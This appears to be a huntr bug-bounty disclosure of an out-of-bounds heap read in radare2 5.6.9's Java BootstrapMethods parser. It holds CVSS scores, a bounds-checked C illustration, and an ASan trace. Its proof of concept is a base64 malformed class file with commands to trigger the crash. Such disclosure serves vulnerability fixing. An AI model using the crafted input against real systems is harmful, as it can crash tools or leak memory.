huntr bounty C8F4C2DE-7D96-4AD4-857A-C099EFFCA2D6 (bet4it)
History: Apr 23, 2022 - 3:09 p.m.

Out-of-bounds Read in r_bin_java_bootstrap_methods_attr_new function

2022-04-23 15:09:28
bet4it
www.huntr.dev

CVSS3: 7.1 High
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
  Attack Vector: LOCAL
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: REQUIRED
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: NONE
  Availability Impact: HIGH

CVSS2: 5.8 Medium
AV:N/AC:M/Au:N/C:P/I:N/A:P
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: NONE
  Availability Impact: PARTIAL

EPSS: 0.001 Low (percentile 26.8%)

  • Description

An out-of-bounds (OOB) read exists in the r_bin_java_bootstrap_methods_attr_new function of radare2 5.6.9: while parsing the BootstrapMethods attribute of a Java class file, the function reads past the end of the heap buffer allocated for the attribute (a 7-byte region in the ASan report below).

This is similar to CVE-2022-0518 and CVE-2022-0521.
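Added illustration, not radare2 code: a bounds-checked reader for the body of a JVM BootstrapMethods attribute (u2 count, then per method a u2 method ref, a u2 argument count and that many u2 arguments). Each two-byte read is validated against the attribute length before it happens, which is the kind of check whose absence the ASan trace shows; the 7-byte sample body and its field values are constructed for the example, not decoded from the PoC blob, and only its length matches the report.

```c
#include <stdint.h>
#include <stddef.h>

/* Cursor over one attribute body; pos never exceeds len. */
typedef struct {
    const uint8_t *buf;
    size_t len;
    size_t pos;
} attr_cursor;

/* Read a big-endian u2. Returns 0 (and leaves *out untouched) when
 * fewer than two bytes remain, instead of reading past the buffer. */
static int read_u2(attr_cursor *c, uint16_t *out) {
    if (c->len - c->pos < 2) {
        return 0;
    }
    *out = (uint16_t)((c->buf[c->pos] << 8) | c->buf[c->pos + 1]);
    c->pos += 2;
    return 1;
}

/* Walk a BootstrapMethods attribute body of `len` bytes. Returns the
 * number of bootstrap methods parsed, or -1 if the declared counts
 * would run past the end of the buffer (the truncated-input case). */
int parse_bootstrap_methods(const uint8_t *buf, size_t len) {
    attr_cursor c = { buf, len, 0 };
    uint16_t num_methods, method_ref, num_args, arg;
    if (!read_u2(&c, &num_methods)) {
        return -1;
    }
    for (uint16_t i = 0; i < num_methods; i++) {
        if (!read_u2(&c, &method_ref) || !read_u2(&c, &num_args)) {
            return -1;
        }
        for (uint16_t j = 0; j < num_args; j++) {
            if (!read_u2(&c, &arg)) {
                return -1; /* argument list cut short: the OOB read point */
            }
        }
    }
    return num_methods;
}

/* Constructed 7-byte body: one method (ref 5) declaring one argument,
 * but only one byte is left where the argument needs two. */
static const uint8_t truncated_attr[7] = { 0x00, 0x01, 0x00, 0x05, 0x00, 0x01, 0x00 };
/* Constructed well-formed body: the same method with its argument complete. */
static const uint8_t valid_attr[8] = { 0x00, 0x01, 0x00, 0x05, 0x00, 0x01, 0x00, 0x07 };
```

Running the parser over `truncated_attr` returns -1 instead of touching the byte after the buffer, which is the read ASan flags at offset 7 of the 7-byte region.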

  • Version
radare2 5.6.9 27745 @ linux-x86-64 git.conti
commit: 14189710859c27981adb4c2c2aed2863c1859ec5 build: 2022-04-23__11:05:49
  • Proof of Concept
# build radare2 with AddressSanitizer
./sys/sanitize.sh

echo yv66vgAAADQADQcACwcADAEADnZpcnR1YWxEYWNoaW5lAQAeKAdMY29tL3N1bi9qZGkvVmlydHVhbE1hY2hpbmU7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAAtNaXJyb3IuamF2YQEAEEJvb3RzdHJhcE1ldGhvZHMBABdGb3VuZF9ieV9naXRodWIvYmV0NGl0OwEAEmNv7S9zdW4vamRpL01pcnJvAQEAEGphdmEvbGFuZy9PYmplY3QGBQABAAIAAAAAAAIEAQADAAQAAAQBEgUABgAAAAIABwAAAAIACAAJAAAAAA== | base64 -d > bootstrap.class
ASAN_OPTIONS=detect_leaks=0:detect_odr_violation=0 r2 -A bootstrap.class
  • ASAN
=================================================================
==608400==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000063cb7 at pc 0x7f5fffc53f0c bp 0x7fff215606c0 sp 0x7fff215606b0
READ of size 1 at 0x602000063cb7 thread T0
    #0 0x7f5fffc53f0b in r_bin_java_bootstrap_methods_attr_new /src/radare2/shlr/java/class.c:6934
    #1 0x7f5fffc04919 in r_bin_java_read_next_attr_from_buffer /src/radare2/shlr/java/class.c:2082
    #2 0x7f5fffc041e5 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2043
    #3 0x7f5fffc0816c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
    #4 0x7f5fffc0a25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
    #5 0x7f5fffc099f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
    #6 0x7f5fffc16be8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
    #7 0x7f5ff974a8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
    #8 0x7f5ff9580989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
    #9 0x7f5ff95751c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
    #10 0x7f5ff95301ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
    #11 0x7f5ff9531060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
    #12 0x7f5ffba2dedd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
    #13 0x7f5ffba30c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
    #14 0x7f6004a2fc10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
    #15 0x559df515e81b in main /src/radare2/binr/radare2/radare2.c:96
    #16 0x7f6003e1a30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)
    #17 0x7f6003e1a3c0 in __libc_start_main@GLIBC_2.2.5 (/usr/lib/libc.so.6+0x2d3c0)
    #18 0x559df515e1a4 in _start (/src/radare2/binr/radare2/radare2+0x21a4)

0x602000063cb7 is located 0 bytes to the right of 7-byte region [0x602000063cb0,0x602000063cb7)
allocated by thread T0 here:
    #0 0x7f6005bb5fb9 in __interceptor_calloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:154
    #1 0x7f5fffc026a9 in r_bin_java_get_attr_buf /src/radare2/shlr/java/class.c:1963
    #2 0x7f5fffc041a6 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2039
    #3 0x7f5fffc0816c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
    #4 0x7f5fffc0a25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
    #5 0x7f5fffc099f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
    #6 0x7f5fffc16be8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
    #7 0x7f5ff974a8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
    #8 0x7f5ff9580989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
    #9 0x7f5ff95751c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
    #10 0x7f5ff95301ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
    #11 0x7f5ff9531060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
    #12 0x7f5ffba2dedd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
    #13 0x7f5ffba30c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
    #14 0x7f6004a2fc10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
    #15 0x559df515e81b in main /src/radare2/binr/radare2/radare2.c:96
    #16 0x7f6003e1a30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)

SUMMARY: AddressSanitizer: heap-buffer-overflow /src/radare2/shlr/java/class.c:6934 in r_bin_java_bootstrap_methods_attr_new
==608400==ABORTING
